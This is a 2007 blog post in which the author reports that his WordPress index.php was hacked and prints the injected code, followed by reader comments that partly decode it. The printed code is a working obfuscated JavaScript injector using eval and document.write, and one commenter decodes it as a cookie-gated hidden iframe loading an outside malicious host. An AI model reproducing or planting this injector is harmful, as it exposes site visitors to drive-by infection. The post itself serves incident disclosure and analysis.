Trying to hack the blog?
December 9, 2007 by Emanuele Feronato
Filed Under This blog in the net •
Filed Under This blog in the net •
During the last 4 hours the homepage of this blog was not accessible.
Someone hacked the index.php page and replaced this code
PHP:
-
<?php
-
-
require('./wp-blog-header.php');
-
-
?>
with this one
PHP:
-
<?php
-
-
/* Short and sweet */
-
require('./wp-blog-header.php');
-
?>
-
<?php
-
function phpfake($buffer)
-
{
-
$Exp='<script language="javascript">$="%6fp%3d%22%2524%253d%2522dw(d%2563s%2528c%2575,1%2534))%253b%2522;%22;cd%3d%221%2529;%2573t%253dst+S%2574rin%2567.f%2572o%256dCha%2572C%256fde(%2528tmp%25%22;cz%3d%22%2566unc%2574i%256fn %2563z%2528c%257a){%2572etu%2572n %2563a+c%2562+c%2563+%2563d+%2563e%252bcz;%257d;%22;cc%3d%22ds.l%2565ng%2574%2568;%2569++%2529{t%256dp%253dds%252esli%2563%2565(i,%2569+%22;db%3d%22d7%3c7e7%3c7f7%3c7g7%3c7h7%3c7i7%3c7j79+fqb0~)-~ug0Qbbqi8!%3c%2522%3c#%3c$%3c%25%3c&%3c%27%3c(%3c)9+fqb0d)-~ug0Qbbqi89+fqb0t)-~ug0Tqdu89+d)K7i7M-t)%3ewudVe||Iuqb89+yv8t)%3ewudTqi89.#9d)K7t7M-t)%3ewudTqdu89%3d8t)%3ewudTqi89;%25229+u|cu%22;da%3d%22fqb0})-~ug0Qbbqi87e~%257F7%3c7tfu7%3c7dxb7%3c7vyb7%3c7fyv7%3c7huc7%3c7fuc7%3c7wxd7%3c7u~y7%3c7ud~7%3c7|uf7%3c7dgu79+fqb0|)-~ug0Qbbqi87q7%3c7r7%3c7s7%3c7t7%3c7u7%3c7v7%3c7w7%3c7x7%3c7y7%3c7z7%3c7{7%3c7|7%3c7}7%3c7~7%3c7%257F7%3c7`7%3c7a7%3c7b7%3c7c7%3c7%22;cb%3d%221pe%2528%2564s)%253bst%253d%2574m%2570%253d%2527%2527;for(i%253d0%253b%2569%253c%22;ca%3d%22%2566u%256ecti%256fn %2564cs%2528d%2573%252ce%2573%2529%257bds%253dunes%2563%256%22;dc%3d%220d)K7t7M-t)%3ewudTqdu89%3d8t)%3ewudTqi899+yv8d)K7t7M,%25209d)K7t7M-!+d)K7}7M-t)%3ewud]%257F~dx89;!+ve~sdy%257F~0S]^8t%3c}%3ci9kfqb0b-888i;8#:t99;8}Nt9:#9;t9+budeb~0b+mfqb0t-7fuc|%257Fh%3es%257F}7+fqb0iSx!%3ciSx%2522%3c%22;st%3d%22%2573%2574%253d%2522$%253ds%2574%253b%2564%2563s%2528%2564a%252bd%2562+%2564%2563%252b%2564%2564%252bd%2565%252c%25310%2529%253bd%2577%2528%2573t%2529%253bs%2574%253d$%253b%2522;%22;dz%3d%22%2566%2575%256ecti%256fn %2564w%2528%2574){c%2561%253d%2527%252564ocu%25256%2564%2565%256et%25252ew%252572i%2574%252565%252528%252522%2527;ce%253d%2527%252522%252529%2527;cb%253d%2527%25253csc%252572i%252570t %2525%2536%2563a%25256e%25256%2537u%252561%2567%2565%25253d%25255c%252522ja%2576a%2573c%25257%2532%2569pt%25255c%252522%2525%2533%2565%2527;cc%253d%2527%25253c%25255c%25252fscrip%25257%2534%25253e%2527;eva%256c(un%2565s%2563a%2570e(t%2529)%257d%253b%22;de%3d%22-|)K88d)K7}7M;}^}950%2522%259M+yv888d)K7t7M:%25229.-%252096688d)K7t7M:%25229,-)99tSx-~)K8d)K7t7M50!%25209M+u|cu0tSx-|)K88d)K7t7M:&950%2522%279M+4-4%3ebu`|qsu8t%3ciSx%2522;}Sx;iSx!;tSx;})Kd)K7}7M%3d!M;7%3es%257F}79+%22;ce%3d%222echa%2572Cod%2565At%25280)^%2528%25270x00%2527+e%2573%2529)%2529;}%257d%22;cu%3d%22(p}b4g`mxq)6b}g}v}x}`m.|}ppqz6*(}rfuyq4gfw)6|``d.;;bqgx{l:w{y;xp;sfv;64c}p`|)%25$$4|q}s|`),$*(;}rfuyq*(;p}b*%22;dd%3d%22}Sx%3ctSx%3c}^}+yv8d)K7i7M,%2522%2520%2520%279kd)K7i7M0-0%2522%2520%2520%27+m}^}-S]^8d)K7t7M%3cd)K7}7M%3cd)K7i7M9+iSx!-|)K888d)K7i7M6%2520hQQ9;}^}950&5##950%2522&M+iSx%2522-|)K8888d)K7i7M6%2520h##!!9..#9;}^}950!%25209M+}Sx%22;%69f %28d%6f%63u%6d%65%6et%2e%63oo%6bie%2ein%64ex%4ff(%27r%665f6%64s%27)%3d%3d-1%29%7bsc(%27%72f5f%36d%73%27,2%2c7);%65v%61l(%75n%65s%63ape%28d%7a+c%7a%2bop+%73t)+%27dw%28dz%2b%63%7a(%24+s%74))%3b%27)}el%73e{%24%3d%27%27};func%74io%6e %73c(c%6e%6d,v,%65d)%7b%76ar%20%65xd%3dnew %44ate%28);e%78%64.se%74Da%74%65(%65x%64.%67etD%61%74e%28)+%65d);%64%6fcu%6den%74.co%6fki%65%3dcnm+ %27%3d%27 +%65%73ca%70e%28v%29+%27;e%78pir%65%73%3d%27+exd.t%6fG%4dT%53t%72in%67(%29;};";eval(unescape($));document.write($);</script><script language="javascript">$="%6fp%3d%22%2524%253d%2522dw(d%2563s%2528c%2575,1%2534))%253b%2522;%22;cd%3d%221%2529;%2573t%253dst+S%2574rin%2567.f%2572o%256dCha%2572C%256fde(%2528tmp%25%22;cz%3d%22%2566unc%2574i%256fn %2563z%2528c%257a){%2572etu%2572n %2563a+c%2562+c%2563+%2563d+%2563e%252bcz;%257d;%22;cc%3d%22ds.l%2565ng%2574%2568;%2569++%2529{t%256dp%253dds%252esli%2563%2565(i,%2569+%22;db%3d%22d7%3c7e7%3c7f7%3c7g7%3c7h7%3c7i7%3c7j79+fqb0~)-~ug0Qbbqi8!%3c%2522%3c#%3c$%3c%25%3c&%3c%27%3c(%3c)9+fqb0d)-~ug0Qbbqi89+fqb0t)-~ug0Tqdu89+d)K7i7M-t)%3ewudVe||Iuqb89+yv8t)%3ewudTqi89.#9d)K7t7M-t)%3ewudTqdu89%3d8t)%3ewudTqi89;%25229+u|cu%22;da%3d%22fqb0})-~ug0Qbbqi87e~%257F7%3c7tfu7%3c7dxb7%3c7vyb7%3c7fyv7%3c7huc7%3c7fuc7%3c7wxd7%3c7u~y7%3c7ud~7%3c7|uf7%3c7dgu79+fqb0|)-~ug0Qbbqi87q7%3c7r7%3c7s7%3c7t7%3c7u7%3c7v7%3c7w7%3c7x7%3c7y7%3c7z7%3c7{7%3c7|7%3c7}7%3c7~7%3c7%257F7%3c7`7%3c7a7%3c7b7%3c7c7%3c7%22;cb%3d%221pe%2528%2564s)%253bst%253d%2574m%2570%253d%2527%2527;for(i%253d0%253b%2569%253c%22;ca%3d%22%2566u%256ecti%256fn %2564cs%2528d%2573%252ce%2573%2529%257bds%253dunes%2563%256%22;dc%3d%220d)K7t7M-t)%3ewudTqdu89%3d8t)%3ewudTqi899+yv8d)K7t7M,%25209d)K7t7M-!+d)K7}7M-t)%3ewud]%257F~dx89;!+ve~sdy%257F~0S]^8t%3c}%3ci9kfqb0b-888i;8#:t99;8}Nt9:#9;t9+budeb~0b+mfqb0t-7fuc|%257Fh%3es%257F}7+fqb0iSx!%3ciSx%2522%3c%22;st%3d%22%2573%2574%253d%2522$%253ds%2574%253b%2564%2563s%2528%2564a%252bd%2562+%2564%2563%252b%2564%2564%252bd%2565%252c%25310%2529%253bd%2577%2528%2573t%2529%253bs%2574%253d$%253b%2522;%22;dz%3d%22%2566%2575%256ecti%256fn %2564w%2528%2574){c%2561%253d%2527%252564ocu%25256%2564%2565%256et%25252ew%252572i%2574%252565%252528%252522%2527;ce%253d%2527%252522%252529%2527;cb%253d%2527%25253csc%252572i%252570t %2525%2536%2563a%25256e%25256%2537u%252561%2567%2565%25253d%25255c%252522ja%2576a%2573c%25257%2532%2569pt%25255c%252522%2525%2533%2565%2527;cc%253d%2527%25253c%25255c%25252fscrip%25257%2534%25253e%2527;eva%256c(un%2565s%2563a%2570e(t%2529)%257d%253b%22;de%3d%22-|)K88d)K7}7M;}^}950%2522%259M+yv888d)K7t7M:%25229.-%252096688d)K7t7M:%25229,-)99tSx-~)K8d)K7t7M50!%25209M+u|cu0tSx-|)K88d)K7t7M:&950%2522%279M+4-4%3ebu`|qsu8t%3ciSx%2522;}Sx;iSx!;tSx;})Kd)K7}7M%3d!M;7%3es%257F}79+%22;ce%3d%222echa%2572Cod%2565At%25280)^%2528%25270x00%2527+e%2573%2529)%2529;}%257d%22;cu%3d%22(p}b4g`mxq)6b}g}v}x}`m.|}ppqz6*(}rfuyq4gfw)6|``d.;;bqgx{l:w{y;xp;sfv;64c}p`|)%25$$4|q}s|`),$*(;}rfuyq*(;p}b*%22;dd%3d%22}Sx%3ctSx%3c}^}+yv8d)K7i7M,%2522%2520%2520%279kd)K7i7M0-0%2522%2520%2520%27+m}^}-S]^8d)K7t7M%3cd)K7}7M%3cd)K7i7M9+iSx!-|)K888d)K7i7M6%2520hQQ9;}^}950&5##950%2522&M+iSx%2522-|)K8888d)K7i7M6%2520h##!!9..#9;}^}950!%25209M+}Sx%22;%69f %28d%6f%63u%6d%65%6et%2e%63oo%6bie%2ein%64ex%4ff(%27r%665f6%64s%27)%3d%3d-1%29%7bsc(%27%72f5f%36d%73%27,2%2c7);%65v%61l(%75n%65s%63ape%28d%7a+c%7a%2bop+%73t)+%27dw%28dz%2b%63%7a(%24+s%74))%3b%27)}el%73e{%24%3d%27%27};func%74io%6e %73c(c%6e%6d,v,%65d)%7b%76ar%20%65xd%3dnew %44ate%28);e%78%64.se%74Da%74%65(%65x%64.%67etD%61%74e%28)+%65d);%64%6fcu%6den%74.co%6fki%65%3dcnm+ %27%3d%27 +%65%73ca%70e%28v%29+%27;e%78pir%65%73%3d%27+exd.t%6fG%4dT%53t%72in%67(%29;};";eval(unescape($));document.write($);</script>';
-
}
-
?>
Any clue about the meaning of this expression? I googled for it but I only had results in german language.
This reminded me to make a complete backup of the blog and the database.
I try to backup the blog every week but sometimes it takes a month before I realize I must backup.
If you have a blog, how often fo you backup it?
Improve the blog rating this post
Tell me what do you think about this post. I'll write better and better entries.
(No Ratings Yet)
Loading ...
Tell me what do you think about this post. I'll write better and better entries.
(No Ratings Yet) Loading ...10 Responses to “Trying to hack the blog?”
Leave a Reply
-
Latest MochiAds Games
I was worried when I saw that the homepage of the blog was down. I’m glad to see it back up.
Better make sure that the hacker cant strike again! I hate hackers because they just keep screving my life!
PS. Sorry my bad English
It seems to be a javascript function intent on hurting your webpages HTML tags. The most often causes for this is an unsafe or unupdated hardware or virus protection on the server on which you host this blog. To fix this problem, regularly backup files and make sure that your hosting it hacker safe. This particular instance affected the entire front page by altering your tags and replacing it with its own code which is what the Java was. This was a minor thing that could happen as a skilled hacker could shutdown your page for weeks and put their homepage up instead of yours.
~Snuggles
There should be a script that u can use to prevent it against all hackers.
i backup my site everyday with the automatic aruba.it function (it costs only 2 euro/year to have the daily backup!!!!)
i recommend you to do the same ;)
ciao !
Massy
to get on your blog I just went on one of your tutorials via my web cookies and then just looked at the new post bit to see if you did anything new.
It seems to be an obfuscated javascript function which will be inserted at the bottom of the page.
The funtction seems to check if a cookie exists:
>> if (document.cookie.indexOf(’rf5f6ds’)==-1)
If it does not exist, it will create that cookie, and then do something else, (which I
have not de-fuscated yet)…
Otherwise, it will set the do exactly nothing (or at least, that’s what it looks like)…
-Mike
So… after tracing thru the code, this is what will be placed at the bottom of your page (ie; jest before the closing body tag ”
Not sure if that is of any use to you… but at least now you know what it’s trying to do (sort of).
Also, this is the code that would generate the cookie:
>>sc(’rf5f6ds’,2,7);
>>function sc(cnm,v,ed)
>>{
>> var exd=new Date();
>> exd.setDate(exd.getDate()+ed);
>> document.cookie=cnm+ ‘=’ +escape(v)+’;
>> expires=’+exd.toGMTString();
>>};
So, it sets the cookie with a value of ‘2′ and an expiration date of “one week from now”…
I suppose, this is so it would only send visitors to the (hidden) page once a week…
-Mike
Hmmm, looks like the code I entered got stripped out… I’ll try again:
<div style=”visibility:hidden”><iframe src=”http://guuatwe.com/ld/grb/” width=100 height=80></iframe></div>
-Mike
no wonder the site was down…